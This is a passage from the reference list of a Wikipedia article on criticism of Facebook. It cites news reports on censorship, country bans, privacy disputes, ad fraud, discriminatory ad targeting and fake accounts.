  399. Yaron, Oded (August 23, 2016). "Is Facebook Censoring Posts Critical of the Social Media Giant?". Haaretz. Retrieved February 25, 2020.
  400. Beckett, Lois (March 27, 2019). "Facebook to ban white nationalism and separatism content". The Guardian. Retrieved February 25, 2020.
  401. Hern, Alex (February 26, 2019). "Facebook moderators tell of strict scrutiny and PTSD symptoms". The Guardian. Retrieved February 25, 2020.
  402. Hern, Alex (December 4, 2019). "Ex-Facebook worker claims disturbing content led to PTSD". The Guardian. Retrieved February 25, 2020.
  403. "Facebook Censored Breastfeeding. Sadly, I Wasn't Surprised". HuffPost. August 17, 2015. Retrieved May 8, 2020.
  404. Tijou, Sarah (March 20, 2017). "Naked mannequin photographer banned from Facebook". BBC Newsbeat. Retrieved May 8, 2020.
  405. Spanish newspaper El País, Estas son las imágenes que Facebook no quiso que vieras Ana Marcos, March 16, 2013, retrieved on March 17, 2015
  406. Norway newspaper aftenposten, Dear Mark. I am writing this to inform you that I shall not comply with your requirement to remove this picture. Espen Egil Hansen, September 9, 2016
  407. Norway newspaper aftenposten, Norway's prime minister and several government members censored by Facebook Kristin Jonassen Nordby, September 9, 2016
  408. Kafka, Peter (September 9, 2016). "Facebook changes its mind, and says it's okay to publish an iconic war photo, after all". Recode.net. Retrieved October 25, 2016.
  409. "Protests mount over Facebook ban on breast-feeding photos; bigger turnout online than in Palo Alto". Mercury News. December 27, 2008.
  410. McGinty, Bill (December 30, 2011). "Facebook apologizes for removing breastfeeding photo". WCNC.COM. Archived from the original on April 10, 2012. Retrieved February 17, 2012.
  411. McGinty, Bill (February 16, 2012). "Photos on breastfeeding Facebook page removed again". WCNC.COM. Archived from the original on April 10, 2012. Retrieved February 17, 2012.
  412. + name + (January 1, 1970). "組員逾八萬 疑有人眼寃不斷施壓 facebook鏟走反民建聯群組 | 蘋果日報 | 要聞港聞 | 20100205". Hk.apple.nextmedia.com. Retrieved February 23, 2014.
  413. "Ответил за Пушкина". Livejournal.com. July 6, 2015. Archived from the original on July 8, 2015.
  414. "Журналист объяснил публикацию слова "хохол" в Facebook экспериментом". Lenta.Ru. July 7, 2015.
  415. "Колумнист Кононенко объяснил пост со словом "хохол" в Facebook желанием поэкспериментировать". Govoritmoskva.ru. July 7, 2015.
  416. "Кононенко заявил о блокировке аккаунта в Facebook за отрывок из Пушкина". RBC.ru. July 6, 2015.
  417. Photoshopped celebrities used for Kashmir pellet gun campaign. BBC News, July 28, 2016.
  418. Doshi, Vidhi. 2016. Facebook under fire for 'censoring' Kashmir-related posts and accounts. The Guardian, July 19, 2016.
  419. Lakshmi, Rama. 2016. Facebook is censoring some posts on Indian Kashmir. The Washington Post, July 27, 2016.
  420. Who removes Kashmir posts on Facebook?. Daily Dawn, July 28, 2016.
  421. Adamczyk, Ed. 2016. Kashmir activist campaign shows Facebook CEO Zuckerberg shot in face. United Press International, July 29, 2016.
  422. "Facebook's Kurdish problem?". Al Jazeera. August 24, 2013. Retrieved June 18, 2017.
  423. Livesay, Christopher (October 7, 2015). "After battling ISIS, Kurds find new foe in Facebook". Public Radio International. WGBH Educational Foundation. Retrieved June 18, 2017.
  424. "Facebook censored 54 posts for 'blasphemy' in Pakistan in second half of 2014 - The Express Tribune". The Express Tribune. Retrieved March 1, 2016.
  425. Faiola, Anthony (January 6, 2016). "Germany springs to action over hate speech against migrants". The Washington Post. Retrieved June 4, 2017.
  426. Bender, Rush; Schechner, Sam (September 14, 2015). "Facebook Outlines Measures to Combat Racist and Xenophobic Content". The Wall Street Journal. Dow Jones & Company. Retrieved June 4, 2017.
  427. Toor, Amar (September 15, 2015). "Facebook will work with Germany to combat anti-refugee hate speech". The Verge. Vox Media. Retrieved June 4, 2017.
  428. Toor, Amar (May 31, 2016). "Facebook, Twitter, Google, and Microsoft agree to EU hate speech rules". The Verge. Vox Media. Retrieved June 4, 2017.
  429. Hern, Alex (May 31, 2016). "Facebook, YouTube, Twitter and Microsoft sign EU hate speech code". The Guardian. Guardian Media Group. Retrieved June 4, 2017.
  430. Dillet, Romain (May 31, 2016). "Facebook, Twitter, YouTube and Microsoft agree to remove hate speech across the EU". TechCrunch. AOL. Retrieved June 4, 2017.
  431. Fioretti, Julia (May 23, 2017). "EU states approve plans to make social media firms tackle hate speech". Reuters. Thomson Reuters. Retrieved June 4, 2017.
  432. Toor, Amar (May 24, 2017). "EU close to making Facebook, YouTube, and Twitter block hate speech videos". The Verge. Vox Media. Retrieved June 4, 2017.
  433. Toor, Amar (June 2, 2017). "Facebook earns EU praise for combatting hate speech, as Twitter and YouTube lag behind". The Verge. Vox Media. Retrieved June 4, 2017.
  434. Macdonald, Alastair; Fioretti, Julia (June 1, 2017). "Social media firms have increased removals of online hate speech: EU". Reuters. Thomson Reuters. Retrieved June 4, 2017.
  435. Yacoub Oweis, Khaled (November 23, 2007). "Syria blocks Facebook in Internet crackdown". Reuters. Retrieved March 5, 2008.
  436. "China's Facebook Status: Blocked". ABC News. July 8, 2009. Archived from the original on July 11, 2009. Retrieved July 13, 2009.
  437. "Facebook Faces Censorship in Iran". American Islamic Congress. August 29, 2007. Archived from the original on April 24, 2008. Retrieved April 30, 2008.
  438. ODPS (2010). "Isle of Man ODPS issues Facebook Guidance booklet" (PDF). Office of the Data Protection Supervisor. Archived from the original (PDF) on November 2, 2012. Retrieved May 1, 2013.
  439. "Pakistan court orders Facebook ban". Belfasttelegraph.co.uk.
  440. Crilly, Rob (May 19, 2010). "Facebook blocked in Pakistan over Prophet Mohammed cartoon row". The Daily Telegraph. London.
  441. "Pakistan blocks YouTube, Facebook over 'sacrilegious content' - CNN.com". May 21, 2010.
  442. "Pakistan blocks YouTube over blasphemous material". GEO.tv. May 20, 2010. Retrieved August 7, 2010.
  443. "Home - Pakistan Telecommunication Authority". Pta.gov.pk. Retrieved August 7, 2010.
  444. "LHC moved for ban on Facebook". Thenews.com.pk. Retrieved December 16, 2018.
  445. "Permanently banning Facebook: Court seeks record of previous petitions". The Express Tribune. May 6, 2011. Retrieved December 16, 2018.
  446. "Organizations blocking Facebook". CTV news.
  447. Benzie, Robert (May 3, 2007). "Facebook banned for Ontario staffers". The Toronto Star. Retrieved March 5, 2008.
  448. "Ontario politicians close the book on Facebook". Blog Campaigning. May 23, 2007. Archived from the original on March 14, 2008. Retrieved March 5, 2008.
  449. "Facebook banned for council staff". BBC News. September 1, 2009. Retrieved February 2, 2010.
  450. "Tietoturvauhan poistuminen voi avata naamakirjan Kokkolassa (In Finnish)". Archived from the original on February 22, 2012. Retrieved February 2, 2010.
  451. "Immediate Ban of Internet Social Networking Sites (SNS) On Marine Corps Enterprise Network (MCEN) NIPRNET". Archived from the original on December 25, 2009. Retrieved February 2, 2010.
  452. "Facebook kiellettiin Keski-Suomen sairaanhoitopiirissä (In Finnish)". Archived from the original on October 25, 2009. Retrieved February 2, 2010.
  453. "Sairaanhoitopiirin työntekijöille kielto nettiyhteisöihin (In Finnish)". Archived from the original on July 20, 2011. Retrieved February 2, 2010.
  454. Fort, Caleb (October 12, 2005). "CIRT blocks access to Facebook.com". Daily Lobo (University of New Mexico). Retrieved April 3, 2006.
  455. "Popular web site, Facebook.com, back online at UNM". University of New Mexico. January 19, 2006. Archived from the original on February 12, 2007. Retrieved April 15, 2007.
  456. Loew, Ryan (June 22, 2006). "Kent banning athlete Web profiles". The Columbus Dispatch. Retrieved October 6, 2006.
  457. "Closed Social Networks as a Gilded Cage". August 6, 2007. Archived from the original on October 29, 2013. Retrieved February 23, 2009.
  458. see NSTeens NSTeens video about private social networking Archived March 10, 2010, at the Wayback Machine
  459. Lapeira's post (October 16, 2008) Three types of social networking
  460. "Openbook - Connect and share whether you want to or not". Youropenbook.org. May 12, 2010. Archived from the original on August 3, 2010. Retrieved August 7, 2010.
  461. "Niet compatibele browser". Facebook. Retrieved August 7, 2010.
  462. "Facebook Privacy Change Sparks Federal Complaint". PC World. Retrieved March 5, 2009.
  463. "Facebook's New Terms Of Service: "We Can Do Anything We Want With Your Content. Forever."". Consumerist. Consumer Media LLC. Archived from the original on October 8, 2009. Retrieved February 20, 2009.
  464. "Improving Your Ability to Share and Connect". Facebook. Retrieved March 5, 2009.
  465. Haugen, Austin (October 23, 2009). "facebook DEVELOPERS". Facebook. Archived from the original on December 23, 2009. Retrieved October 25, 2009.
  466. "Facebook Town Hall: Proposed Facebook Principles". Facebook. Archived from the original on February 27, 2009. Retrieved March 5, 2009.
  467. "Facebook Town Hall: Proposed Statement of Rights and Responsibilities". Facebook. Archived from the original on February 27, 2009. Retrieved March 5, 2009.
  468. "Governing the Facebook Service in an Open and Transparent Way". Facebook. Retrieved March 5, 2009.
  469. "Rewriting Facebook's Terms of Service". PC World. Retrieved March 5, 2009.
  470. "Democracy Theatre on Facebook". University of Cambridge. Retrieved April 4, 2009.
  471. "Facebook's theatrical rights and wrongs". Open Rights Group. Archived from the original on April 6, 2009. Retrieved April 4, 2009.
  472. "Complaint, Request for Investigation, Injunction, and Other Relief" (PDF). Epic.org. Retrieved December 16, 2018.
  473. "Supplemental Materials in Support of Pending Complaint and Request for Injunction, Request for Investigation and for Other Relief" (PDF). Epic.org. Retrieved December 16, 2018.
  474. Puzzanghera, Jim (March 1, 2011). "Facebook reconsiders allowing third-party applications to ask minors for private information". Los Angeles Times.
  475. Center, Electronic Privacy Information. "EPIC - Facebook Resumes Plan to Disclose User Home Addresses and Mobile Phone Numbers". epic.org.
  476. Baker, Gavin (May 27, 2008). "Free software vs. software-as-a-service: Is the GPL too weak for the Web?". Free Software Magazine. Archived from the original on May 17, 2013. Retrieved June 29, 2009.
  477. "Statement of Rights and Responsibilities". Facebook. May 1, 2009. Retrieved June 29, 2009.
  478. Calore, Michael (December 1, 2008). "As Facebook Connect Expands, OpenID's Challenges Grow". Wired. Retrieved June 29, 2009. Facebook Connect was developed independently using proprietary code, so Facebook's system and OpenID are not interoperable. ... This is a clear threat to the vision of the Open Web, a future when data is freely shared between social websites using open source technologies.
  479. Thompson, Nicholas. "What Facebook Can Sell". The New Yorker. Retrieved May 18, 2014.
  480. Barnett, Emma (May 23, 2012). "Facebook Settles Lawsuit With Angry Users". The Telegraph. London. Retrieved May 18, 2014.
  481. Dijck 2013, p. 47.
  482. Farber, Dan. "Facebook Beacon Update: No Activities Published Without Users Proactively Consenting". ZDNet. Retrieved May 18, 2014.
  483. Sinker, Daniel (February 17, 2009). "Face/Off: How a Little Change in Facebook's User Policy is Making People Rethink the Rights They Give Away Online". Huffingtonpost. Retrieved May 28, 2014.
  484. Dijck 2013, p. 48.
  485. Brunton, Finn. "Vernacular Resistance to Data Collection and Analysis: A Political Theory of Obfuscation". First Monday. Retrieved May 18, 2014.
  486. "BBB Review of Facebook". Retrieved December 12, 2010.
  487. "TrustLink Review of Facebook". Archived from the original on June 13, 2010. Retrieved May 5, 2010.
  488. Emery, Daniel (July 29, 2010). "BBC News - Details of 100m Facebook users collected and published". Bbc.co.uk. Retrieved August 7, 2010.
  489. Nicole Perlroth (June 3, 2013). "Bits: Malware That Drains Your Bank Account Thriving on Facebook". The New York Times. Retrieved June 9, 2013.
  490. Bort, Julie (April 20, 2011). "Researcher: Facebook Ignored the Bug I Found Until I Used It to Hack Zuckerberg - Yahoo! Finance". Finance.yahoo.com. Retrieved August 19, 2013.
  491. "Zuckerberg's Facebook page hacked to prove security exploit". CNN.com. May 14, 2013. Retrieved August 19, 2013.
  492. Tom Warren (August 1, 2013). "Facebook ignored security bug, researcher used it to post details on Zuckerberg's wall". The Verge. Retrieved August 19, 2013.
  493. "Hacker who exposed Facebook bug to get reward from unexpected source - Yahoo! Finance". Finance.yahoo.com. Reuters. August 20, 2013. Archived from the original on August 21, 2013. Retrieved August 22, 2013.
  494. Rogoway, Mike (January 21, 2010). "Facebook picks Prineville for its first data center". OregonLive.com. Retrieved January 21, 2010.
  495. Kaufman, Leslie (September 17, 2010). "You're 'So Coal': Angling to Shame Facebook". The New York Times.
  496. Albanesius, Chloe (September 17, 2010). "Greenpeace Attacks Facebook on Coal-Powered Data Center". PC Magazine.
  497. "Facebook update: Switch to renewable energy now Greening Facebook from within". Greenpeace. February 17, 2010.
  498. Tonelli, Carla (September 1, 2010). "'Friendly' push for Facebook to dump coal". Reuters. Archived from the original on October 13, 2010. Retrieved February 23, 2014.
  499. "Dirty Data Report Card" (PDF). Greenpeace. Retrieved August 22, 2013.
  500. "Facebook and Greenpeace settle Clean Energy Feud". Techcrunch. Retrieved August 22, 2013.
  501. "Facebook Commits to Clean Energy Future". Greenpeace.org. Greenpeace. Retrieved August 22, 2013.
  502. "Startup Claims 80% Of Its Facebook Ad Clicks Are Coming From Bots". TechCrunch.com. January 4, 2011. Retrieved July 31, 2012.
  503. Rodriguez, Salvador (July 30, 2012). "Start-up says 80% of its Facebook ad clicks came from bots". Latimes.com. Retrieved July 31, 2012.
  504. Sengupta, Somini (April 23, 2012). "Bots Raise Their Heads Again on Facebook - NYTimes.com". Bits.blogs.nytimes.com. Retrieved July 31, 2012.
  505. Hof, Robert. "Stung By Click Fraud Allegations, Facebook Reveals How It's Fighting Back". Forbes. Retrieved December 16, 2018.
  506. "Guide to the Ads Create Tool". Facebook. Retrieved June 11, 2014.
  507. "Facebook Advertisers Complain Of A Wave Of Fake Likes Rendering Their Pages Useless". Business Insider. February 11, 2014. Retrieved June 11, 2014.
  508. Kirtiş, A. Kazım; Karahan, Filiz (October 5, 2011). "Efficient Marketing Strategy". Procedia - Social and Behavioral Sciences. 24: 260–268. doi:10.1016/j.sbspro.2011.09.083.
  509. "Are 40% Of Life Science Company Facebook Page 'Likes' From Fake Users?". Comprendia. Retrieved June 7, 2014.
  510. "Facebook, Inc. Form 10K". United States Securities and Exchange Commission. January 28, 2014. Retrieved June 7, 2014.
  511. "What Do Facebook "likes" of Companies Mean?". PubChase. January 23, 2014. Archived from the original on July 3, 2014. Retrieved June 7, 2014.
  512. "Facebook Fraud". YouTube. February 10, 2014. Retrieved June 11, 2014.
  513. "Firms withdraw BNP Facebook ads". BBC News. August 3, 2007. Retrieved April 30, 2010.
  514. "Facebook halts ads that exclude racial and ethnic groups". USA Today. Retrieved March 29, 2019.
  515. Brandom, Russell (March 28, 2019). "Facebook has been charged with housing discrimination by the US government". The Verge. Retrieved March 29, 2019.
  516. Julia Angwin, Ariana Tobin (November 21, 2017). "Facebook (Still) Letting Housing Advertisers Exclude Users by Race". ProPublica. Retrieved March 29, 2019.
  517. Robertson, Adi (April 4, 2019). "Facebook's ad delivery could be inherently discriminatory, researchers say". The Verge. Retrieved April 8, 2019.
  518. Julia Angwin, Terry Parris Jr (October 28, 2016). "Facebook Lets Advertisers Exclude Users by Race". ProPublica. Retrieved March 29, 2019.
  519. "Improving Enforcement and Promoting Diversity: Updates to Ads Policies and Tools". Facebook. Retrieved March 29, 2019.
  520. Statt, Nick (July 24, 2018). "Facebook signs agreement saying it won't let housing advertisers exclude users by race". The Verge. Retrieved March 29, 2019.
  521. Statt, Nick (August 21, 2018). "Facebook will remove 5,000 ad targeting categories to prevent discrimination". The Verge. Retrieved March 29, 2019.
  522. "Facebook agrees to overhaul targeted advertising system for job, housing and loan ads after discrimination complaints". Washington Post. March 19, 2019. Retrieved March 29, 2019.
  523. Madrigal, Alexis C. (March 20, 2019). "Facebook Does Have to Respect Civil-Rights Legislation, After All". The Atlantic. Retrieved March 29, 2019.
  524. Yurieff, Kaya. "HUD charges Facebook with housing discrimination in ads". CNN. Retrieved March 29, 2019.
  525. "Facebook: About 83 million accounts are fake". USA Today. August 3, 2012. Retrieved August 4, 2012.
  526. "Unreal: Facebook reveals 83 million fake profiles". Sydney Morning Herald. Retrieved August 4, 2012.
  527. Rushe, Dominic (August 2, 2012). "Facebook share price slumps below $20 amid fake account flap". The Guardian. London. Retrieved August 4, 2012.
  528. Gupta, Aditi (2017). Towards detecting fake user accounts in facebook. Asia Security and Privacy (ISEASP). pp. 1–6. doi:10.1109/ISEASP.2017.7976996. ISBN 978-1-5090-5942-3.
  529. "Facebook Takes 4 Years to Remove A Woman's Butthole as a Business Page".
  530. "The Facebook Blog - Moving to the new Facebook".
  531. "Facebook Newsroom". newsroom.fb.com.
  532. "Petition against Facebook redesign fails as old version disabled". Archived from the original on September 12, 2012.
  533. "Facebook's New Privacy Changes: The Good, The Bad, and The Ugly | Electronic Frontier Foundation". Eff.org. December 9, 2009. Retrieved August 7, 2010.
  534. "Gawker.com". Gawker.com. December 13, 2009. Archived from the original on May 17, 2013. Retrieved June 11, 2013.
  535. "What Does Facebook's Privacy Transition Mean for You? | ACLUNC dotRights". Dotrights.org. December 4, 2009. Archived from the original on December 12, 2009. Retrieved December 13, 2009.
  536. "Facebook faces criticism on privacy change". BBC News. December 10, 2008. Retrieved December 13, 2009.
  537. "ACLU.org". Secure.aclu.org. Archived from the original on February 24, 2012. Retrieved June 11, 2013.
  538. "Facebook CEO's Private Photos Exposed by the New 'Open' Facebook". Gawker.com. Archived from the original on December 14, 2009. Retrieved December 13, 2009.
  539. McCarthy, Caroline. "Facebook backtracks on public friend lists | The Social - CNET News". News.cnet.com. Retrieved December 13, 2009.
  540. "Mediactive.com". Mediactive.com. December 12, 2009. Retrieved June 11, 2013.
  541. Oremus, Will. "TheBigMoney.com". TheBigMoney.com. Retrieved June 11, 2013.
  542. "ReadWriteWeb.com". ReadWriteWeb.com. Archived from the original on January 13, 2010. Retrieved June 11, 2013.
  543. Benny Evangelista (January 27, 2010). "SFgate.com". SFgate.com. Retrieved February 23, 2014.
  544. Deppa, Seetharaman (January 11, 2018). "Facebook to Rank News Sources by Quality to Battle Misinformation". The New York Times. Retrieved March 5, 2018.
  545. Mark Zuckerberg, , Facebook, January 12, 2018
  546. Isaac, Mike (January 11, 2018). "Facebook Overhauls News Feed to Focus on What Friends and Family Share". The New York Times. Retrieved March 5, 2018.
  547. Mosseri, Adam (January 11, 2018). "News Feed FYI: Bringing People Closer Together". Facebook newsroom. Retrieved March 5, 2018.
  548. ENGEL BROMWICH, JONAH; HAAG, MATTHEW (January 12, 2018). "Facebook Is Changing. What Does That Mean for Your News Feed?". The New York Times. Retrieved March 5, 2018.
  549. Bell, Emily (January 21, 2018). "Why Facebook's news feed changes are bad news for democracy". The Guardian. Retrieved March 11, 2018.
  550. Dojcinovic, Stevan (November 15, 2017). "Hey, Mark Zuckerberg: My Democracy Isn't Your Laboratory". The New York Times. Retrieved March 11, 2018.
  551. Shields, Mike (February 28, 2018). "Facebook's algorithm has wiped out a once flourishing digital publisher". The New York Times. Retrieved March 12, 2018.
  552. "The top 10 facts about FreeBasics". December 28, 2015. Archived from the original on March 2, 2016.
  553. "Free Basics by Facebook". Internet.org.
  554. "TRAI Releases the 'Prohibition of Discriminatory Tariffs for Data Services Regulations, 2016'" (PDF). TRAI. February 8, 2016. Archived from the original (PDF) on February 8, 2016.
  555. "How India Pierced Facebook's Free Internet Program". Backchannel. February 1, 2016.
  556. "TRAI letter to Facebook" (PDF). Archived from the original (PDF) on February 19, 2016.
  557. "Trai to Seek Specific Replies From Facebook Free Basic Supporters". Press Trust of India. December 31, 2015.
  558. Brühl, Jannis; Tanriverdi, Hakan (2018). "Gut für die Welt, aber nicht für uns". sueddeutsche.de (in German). ISSN 0174-4917. Retrieved December 10, 2018.
  559. "Tech bosses grilled over claims of 'harmful' power". BBC News. July 30, 2020. Retrieved July 30, 2020.
  560. Business, Brian Fung, CNN. "Congress grilled the CEOs of Amazon, Apple, Facebook and Google. Here are the big takeaways". CNN. Retrieved July 30, 2020.

Further reading

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.